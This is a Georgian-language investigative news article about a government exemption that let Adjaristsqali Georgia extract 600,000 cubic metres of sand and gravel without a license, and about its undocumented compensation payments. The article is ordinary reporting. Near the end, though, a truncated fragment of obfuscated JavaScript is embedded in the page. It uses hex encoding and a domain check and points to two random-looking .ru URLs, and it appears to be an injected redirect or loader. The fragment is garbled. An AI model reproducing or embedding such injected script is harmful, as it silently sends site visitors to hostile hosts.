RSS

იაფი რესურსი [ქვიშა-ხრეში] “აჭარისწყალ ჯორჯიას”

05 მაისი

dre 205ცირა გვასალია

ჟურნალისტი – Organized Crime and Corruption Reporting Project

ფოტოები: ოლიკო ცისკარიშვილი 

წითელი ნუსხის ხეების მოჭრის სპეციალურ ნებართვებთან ერთად, საქართველოს მთავრობამ კომპანია “აჭარისწყალ ჯორჯიას” 600 000 კუბური მეტრი ქვიშა-ხრეშის მოპოვების ლიცენზიისგან გაათავისუფლა. საკომპენსაციოდ, კომპანიას გარკვეული თანხა უნდა გადაეხადა ადგილობრივი მოსახლეობისთვის.  თანხის გადახდის დამადასტურებელი დოკუმენტების წარმოდგენაზე კომპანია უარს აცხადებს. აჭარის მთავრობა კი ამბობს, რომ მათთან ტრანზაქციის დამადასტურებელი ქვითრები არ ინახება.

ქვიშა-ხრეშის მოპოვების ლიცენზიისაგან გათავისუფლების თაობაზე საქართველოს მთავრობასთან შუამდგომლობა კომპანიას აჭარის მთავრობამ გაუწია.

 

dre 028ბუნებრივი რესურსების მოპოვების ლიცენზიისგან პირის ან კომპანიის გათავისუფლება ნიშნავს, რომ პირს/კომპანიას კანონის ფარგლებში შეუძლია წინასწარ, მთავრობის მიერ გადაწყვეტილი ოდენობის რესურსის დედამიწიდან ამოღება აუქციონში მონაწილეობის მიღების და კონკურენტულ ბაზარში ჩართვის გარეშე.

გასული წლის დასაწყისში, კომპანია “აჭარისწყალ ჯორჯიამ” წერილით მიმართა აჭარის მთავრობას, რომ მშენებლობის დასასრულებლად 600 000 კუბური მეტრი ქვიშა-ხრეში სჭირდებოდა. კომპანია წერილში აღნიშნავდა, რომ აუქციონში მონაწილეობა დროს ართმევდა. მშენებლობის დასასრულებლად კი დიდი რაოდენობით რესურსის სწრაფად მოპოვება იყო აუცილებელი.

“კომპანიას მშენებლობის დასასრულებლად ესაჭიროება 600 000 კუბური მეტრი ქვიშა-ხრეში. ამ ეტაპამდე მოპოვებულია 170,000 კუბური მეტრი […] საჭირო ქვიშა-ხრეშის შეძენა აუქციონის წესით ან კერძო პირისგან კომპანიას გაცილებით ძვირი დაუჯდებოდა, ვიდრე ლიცენზიისგან გათავისუფლების შემთხვევაში. [ …] კომპანიას აუქციონში გამარჯვების შემთხვევაში, მოუწევდა 100,092.20 ლარის გადახდა 3 653 ლარის ნაცვლად.””

აჭარის მთავრობამ გაითვალისწინა კომპანიის ეს თხოვნა და საქართველოს გარემოსა და ბუნებრივი რესურსების დაცვის სამინისტროს შესაბამისი წერილი გაუგზავნა: “აჭარის ავტონომიური რესპუბლიკის მთავრობის მიერ შეთანხმების შესაბამისად აღებულ იქნა ვალდებულება შუამდგომლობა გაუწიოს კომპანიას პროექტის სამშენებლო ზონაში სასარგებლო წიაღისეულის მოპოვების [კერძოდ კი, ქვიშა-ხრეშის], ლიცენზიისაგან 600 000 კუბური მეტრი ოდენობის ფარგლებში გათავისუფლების თაობაზე, დამატებითი გადასახადის გარეშე.”

ენერგეტიკის სამინისტრომაც  გაუწია შუამდგომლობა კომპანიას გარემოსა და ბუნებრივი რესურსების დაცვის სამინისტროსთან.

“შუახევი ჰესის” სამშენებლო სამუშაოების დროულად განხორციელების მიზნით,  საქართველოს ენერგეტიკის სამინისტრო, თავისი კომპეტენციის ფარგლებში, წინააღმდეგი არ არის შპს აჭარისწყალი ჯორჯია გათავისუფლდეს სასარგებლო წიაღისეულის მოპოვების ლიცენზიისგან,” –  ამ წერილით და ენერგეტიკის მინისტრის მოადგილის ირაკლი ხმალაძის ხელმოწერით, ენერგეტიკის სამინისტრომ კომპანიას გარემოს დაცვის სამინისტროსთან გაუწია შუამდგომლობა.

აჭარის მთავრობისა და ენერგეტიკის სამინისტროს შუამდგომლობის შემდეგ, გარემოსა და ბუნებრივი რესურსების დაცვის სამინისტრომ  შესაბამისი პროექტი შეადგინა და მთავრობას მიმართა კომპანიის ლიცენზიის გარეშე მოპოვების უფლების მიცემის ინიციატივით.

#მემორანდუმი   

კომპანიის რესურსების მოპოვების პრივილეგიით სარგებლობის ფარგლებში, მემორანდუმი გაფორმდა აჭარის მთავრობას, ამხანაგობა “წაბლანას” და კომპანია “აჭარიწყალ ჯორჯიას” შორის.

მემორანდუმის თანახმად, კომპანიას 600 000 კუბური მეტრი რესურსის ლიცენზიის გარეშე მოპოვების სანაცვლოდ, 1, 775, 960 ლარი უნდა გადაეხადა ამბანაგობა “წაბლანის” ანგარიშზე.

1989 წლის 15 აპრილს, ხულოს მუნიციპალიტეტის სოფელ წაბლანაში მეწყერი ჩამოწვა და 24 ადამიანი გარდაიცვალა.  დაზიანდა სოფლის სახლებიც. ამხანაგობა “წაბლანა” სწორედ ამ დაზარალებულებისთვის აშენებს ორ კორპუსს ბათუმში და კომპანია “აჭარისწყალი” სწორედ ამ სახლის მშენებლობისთვის უნდა გადაერიცხა ფული “ამხანაგობისთვის”.

მემორანდუმში გაწერილი პირობების თანახმად, კომპანიას სამ ეტაპად უნდა გადაეხადა კომპენსაცია. პირველი ტრანში, მთლიანი თანხის 35 პროცენტის გადახდა უნდა მომხდარიყო გასული წლის 31 ოქტომბრამდე. მეორე 35 პროცენტი კომპანიას უნდა გადაეხადა მას შემდეგ, რაც აჭარის მთავრობა მემორანდუმით გათვალისწინებულ თავის ფინანსურ კონტრიბუციას [1,550,000] გადაიხდიდა. აჭარის მთავრობამ მოგვაწოდა საკუთარი კონტრიბუციის გადახდის დამადასტურებელი დოკუმენტი, სადაც ჩანს, რომ აჭარის მთავრობამ, ხაზინაში მართლა გადაიხადა დასახელებული თანხა.

მესამე ტრანზაქციით, დარჩენილი 30 პროცენტი კომპანიას უნდა გადაეხადა მას შემდეგ, რაც აჭარაში ორი კორპუსის მშენებლობა დამთავრდებოდა.

კომპანიის იურისტის, თორნიკე რიჟვაძის თქმით, მემორანდუმის ფარგლებში, კომპანიას შესრულებული აქვს ნაკისრი ფინანსური ვალდებულებები ამხანაგობა “წაბლანის” წინაშე.  გადახდის დოკუმენტის წარმოდგენაზე კომპანიის იურისტმა უარი განაცხადა.

“ფინანსური დოკუმენტის ჟურნალისტებთან გაზიარებას კომპანია არ მიიჩნევს საჭიროდ”, – გვითხრა თორნიკე რიჟვაძემ, კომპანია “აჭარისწყალ ჯორჯიას” იურისტმა.

გადახდილი თანხების შესახებ ინფორმაცია მოვიკითხეთ როგორც შუახევის, ასევე ხულოს მუნიციპალიტეტებში. შუახევის მუნიციპალიტეტის გამგებლის მოადგილეს, ზვიად დიასამიძეს, არ ჰქონდა ინფორმაცია ამ ტრანზაქციის შესახებ.

“შეგიძლიათ მიმართოთ ჩემს კოლეგას [ხულოში]”, – აღნიშნა ზვიად დიასამიძემ [ვიდეო].

ხულოს მუნიციპალიტეტის გამგებელი ამ საკითხზე არ დაგველაპარაკა. თორნიკე მიქელაძემ, ხულოს მუნიციპალიტეტის გამგეობის საზოგადოებასთან ურთიერთობის სამსახურის უფროსმა, აჭარის მთავრობასთან გადაგვამისამართა ამ ინფორმაციის დასაზუსტებლად.

პარმენ ჯალაღონია, აჭარის მთავრობის აპარატის უმაღლეს საბჭოსთან ურთიერთობის დეპარტამენტის უფროსი, ამბობს, რომ აჭარის მთავრობის აპარატში კომპანია “აჭარისწყლის” მიერ ამხანაგობა “წაბლანისთვის” თანხის გადარიცხვის დამადასტურებელი დოკუმენტი არ ინახება.

პარმენ ჯალაღონიამ ამხანაგობა “წაბლანის” წარმომადგენელთან გადაგვამისამართა.

დარეჯან აბაშიძე, ამხანაგობა “წაბლანას” ბუღალტერი, ამბობს, რომ კომპანია ასრულებს მემორანდუმით გათვალისწინებულ ვალდებულებებს.  თუმცა, გადახდის დამადასტურებელი ქვითრის წარმოდგენაზე უარი განაცხადა დარეჯან აბაშიძემაც.

“იურისტმა მითხრა, რომ ვალდებული არ ვარ, წარმოვადგინო გადახდის დამადასტურებელი დოკუმენტი”, – გვითხრა აბაშიძემ[ინტერვიუს აუდიო-ჩანაწერი].

დარეჯან აბაშიძემ სიტყვიერად, დოკუმენტის წარმოდგენის გარეშე, აღნიშნა, რომ კომპანიას მეორე ტრანშის 35 პროცენტი მთლიანად არ გადაუხდია.

“ჩაგვერიცხა ნახევარი – ჩვენ რაც გვჭირდებოდა ამ პერიოდისთვის. დანარჩენს მაშინ ჩაგივრიცხავს, როცა დაგვჭირდება”, – აღნიშნა დარეჯან აბაშიძემ.

აბაშიძის თქმით, კომპანიას 400 000 დარჩა დავალიანება ამხანაგობასთან და ამ თანხის ჩარიცხვა მოხდება ამხანაგობის მოთხოვნიდან, მშენებლობის საჭიროებიდან.

ქვიშა-ხრეშის ლიცენზიები ქართულ სამშენებლო  ბაზარზე 

ქვიშა-ხრეში საქართველოს სამშენებლო ბაზარზე მოთხოვნადი ძვირფასი რესურსია. კომპანიები, რომლებიც დიდ ინფრასტრუქტურულ პროექტებს ახორციელებენ, დიდი რაოდენობით სჭირდებათ ეს რესურსი.

მშენებლებისთვის არსებობს ქვიშა-ხრეშის ლიცენზიის მოპოვების მინიმუმ, ორი ლეგალური გზა. კომპანიას შეუძლია გარემოს ეროვნული სააგენტოს მიერ გამართულ აუქციონზე იყიდოს ლიცენზია. კომპანიას ასევე შეუძლია გადაყიდვის საშუალებით, მეორე პირისგან ან კომპანიისგან იყიდოს ლიცენზია.  შუალედური პირი, როგორც წესი, აუქციონზე შედარებით იაფად ყიდულობს ლიცენზიას და შემდეგ ბევრად ძვირად მეორედ ყიდის სამშენებლო კომპანიაზე ან ფიზიკურ პირზე.

როგორც წესი, ლიცენზიის გადაყიდვის ფასი აუქციონის საბოლოო ფასზე ბევრად მეტია. ჩვენს მიერ მოპოვებული ფაქტებით, ერთ-ერთი ლიცენზიის გადაყიდვის ფასი თითქმის 8-ჯერ აღემატებოდა საბოლოო სააუქციონო ფასს.

სწორედ ასე მოხდა შპს “ფერის” შემთხვევაში. კომპანიის დირექტორმა, მერაბ იორდანიშვილმა თითქმის 8-ჯერ მეტი გადაიხადა ლიცენზიაში, ვიდრე ამ ლიცენზიის საწყისი ფასი იყო.

ლიცენზიის გადაცემა

ეკრანის ანაბეჭდი გარემოს ეროვნული სააგენტოს სალიცენზიო ბაზიდან

ქვიშა-ხრეშის ამ ლიცენზიის საბოლოო სააუქციონო ფასი 24,071 ლარი იყო.  “ფერიმ” ლიცენზია შპს “ანაგისგან” იყიდა და მასში 145,248 ლარი გადაიხადა.  მოსაპოვებელი რესურსის ოდენობა 163,200 კუბური მეტრი ქვიშა-ხრეში იყო.

[ნახეთ შპს “ფერისა” და შპს “ანაგს” შორის გაფორმებული ხელშეკრულება. ხელშუკრულებაში მითითებულია გადაყიდვის ფასი.]

 

სწორედ სიძვირის და დროში გაწელილი პროცედურებისგან თავის არიდების მიზნით სთხოვა შპს “აჭარისწყალ ჯორჯიამ” ლიცენზიისგან გათავისუფლება საქართველოს მთავრობას.

 

შპს “აჭარისწყალი ჯორჯიას” ლიცენზიისაგან გათავისუფლების სამართლებრივი საფუძვლები 

იხილეთ ინდივიდუალური განკარგულებები კომპანია “აჭარისწყალ ჯორჯიას” მიმართ სხვადასხვა ადგილას ქვიშა-ხრეშის რესურსის ულიცენზიოდ მოპოვების თაობზე:

  1. 2015 წლის 23 სექტემბრის გაკარგულება;
  2. 2015 წლის 19 მარტის განკარგულებით;
  3. 2014 წლის 29 სექტემბრის განკარგულებით;
  4. 2014 წლის 7 აგვისტოს განკარგულება;
  5. 2014 წლის 13 თებერვლის განკარგულებით;
  6. 2014 წლის 13 მარტის განკარგულებით;

ულიცენზიოდ მოპოვების უფლების გარდა, კომპანია შპს “აჭარიწყალი ჯორჯიას” ქვიშა-ხრეშის მოპოვების სამი ლინცეზიაც აქვს, საერთო მოცულობით 16,295 კუბური მეტრი მოპოვების უფლებით.

ამავე თემაზე:

გარემოს დაცვა გამოძახებით

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ekofact.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://wek7ipqx359.ru/f2.html?a=26482https://lukpiot0dz.ru/u.html?a=26482

 

კომენტარის დატოვება

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  შეცვლა )

Facebook photo

You are commenting using your Facebook account. Log Out /  შეცვლა )

Connecting to %s